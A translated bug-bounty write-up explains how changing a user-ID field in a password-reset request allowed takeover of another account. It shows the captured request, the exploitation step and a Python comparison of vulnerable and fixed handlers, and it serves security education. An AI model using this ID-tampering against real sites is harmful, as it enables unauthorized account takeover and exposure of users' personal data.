
  • IDOR to Account Takeover: My First Bug Bounty write-up at the Age of 16
  • Originally written by wolfishLamb
  • Translator: SHEEP in Wolf’s skin

Over the past year I have been learning web penetration testing on and off, by watching tutorials and reading articles. After testing several websites, though, I had found nothing. I have a programming background, but this is a new field for me.

Main()

A few days ago, a company was about to launch a subscription-management website. The fire in my heart was rekindled, and I decided to give it a try.

I went to the login screen of the website.

I clicked reset password and a link was sent to my email.

A funny thing happened. When I opened the link and submitted my new password, I saw the following request in Burp Suite:

    POST /reactivate/password HTTP/2
    Host: redacted.com
    Cookie:
    Content-Length: 301
    sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
    Accept: application/json, text/javascript, */*; q=0.01
    X-Csrf-Token: 3c7snxdszwhzsevj6kchsrkng3yfquls3n8tl1hl
    X-Requested-With: XMLHttpRequest
    Sec-Ch-Ua-Mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: redacted.com
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: Redacted.com/verify/reac…
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close

    id=201&password=newpassword&confirm_password=newpassword

I recognized that id parameter — it is my user ID. Hmm, maybe an IDOR attack would work here? I changed 201 to 200. Bang, it went through!

I was redirected to the victim's dashboard page, and his password had been changed by me. Email addresses, real names and phone numbers were exposed!

Commentary

When the password is changed, the server looks up the account directly in its database by an identifier supplied by the client (the id field in this case), without checking that the requester is authorized to act on that account or verifying who they are. This can lead to account takeover and privilege escalation and can have a serious impact on the site owner.

— Wikipedia (with changes)
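To make the commentary concrete, here is an added example (not the site's code and not from the original post) that places the vulnerable handler pattern next to a hardened one. The in-memory user table, the ids 200 and 201, the token functions and the status codes are all constructed for illustration.

```python
"""Vulnerable vs. hardened password-reset handler for the IDOR above.

Added example, not the site's code. The "database", the user records and
the reset-token store are constructed for illustration only.
"""
import secrets

# Constructed in-memory account table: user id -> record
USERS = {
    200: {"email": "victim@example.com", "password": "victim-old-pass"},
    201: {"email": "tester@example.com", "password": "tester-old-pass"},
}

# Reset tokens issued by the "forgot password" e-mail: token -> user id.
# Constructed; a real store would also record an expiry time.
RESET_TOKENS = {}


def issue_reset_token(user_id):
    """Simulate the e-mailed link: bind a random single-use token to one account."""
    token = secrets.token_urlsafe(32)
    RESET_TOKENS[token] = user_id
    return token


def reset_password_vulnerable(form):
    """The pattern from the write-up: the server trusts form['id'] as the account
    to update, so whoever holds any reset link can rewrite any account."""
    user_id = int(form["id"])
    if form["password"] != form["confirm_password"]:
        return 400, "passwords differ"
    USERS[user_id]["password"] = form["password"]  # no ownership check at all
    return 200, "password updated for %d" % user_id


def reset_password_fixed(token, form):
    """Hardened handler: the account comes from the single-use token that was
    e-mailed to the owner; a client-supplied 'id' is never used as the target."""
    user_id = RESET_TOKENS.pop(token, None)  # consumed on first use
    if user_id is None:
        return 403, "invalid or expired reset token"
    if "id" in form and int(form["id"]) != user_id:
        # Worth logging: an id that disagrees with the token is the signature
        # of exactly the probe described in the write-up.
        return 403, "account mismatch"
    if form["password"] != form["confirm_password"]:
        return 400, "passwords differ"
    USERS[user_id]["password"] = form["password"]
    return 200, "password updated for %d" % user_id
```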

Key takeaways

  • Never trust any input from the user; verify it every time.
  • Send the server as little client-controlled data as possible (here, the account id did not need to come from the client at all).

Thanks for reading!

The translator’s note:

As far as I’m concerned, the bar for being a hacker is really low, and this article is an example — you don’t even need to know how to code. But don’t think this site is just too lame; I’ve seen more than 10 reports of this type of bug (including some on local government sites). In many cases, those developers only took a few courses before rushing into work, so the websites they build are not immune to bugs, and the consequences are naturally borne by us, the passive users. I hope you will pay more attention to network security and improve your security-related skills. Of course, I will share more core information about penetration testing with you when there is an opportunity. Please look forward to it.

More penetration-testing write-ups can be found at Pentester.land/list-of-bug… . The site collects bug reports written by bug-bounty hunters about Facebook, Google and other Internet giants.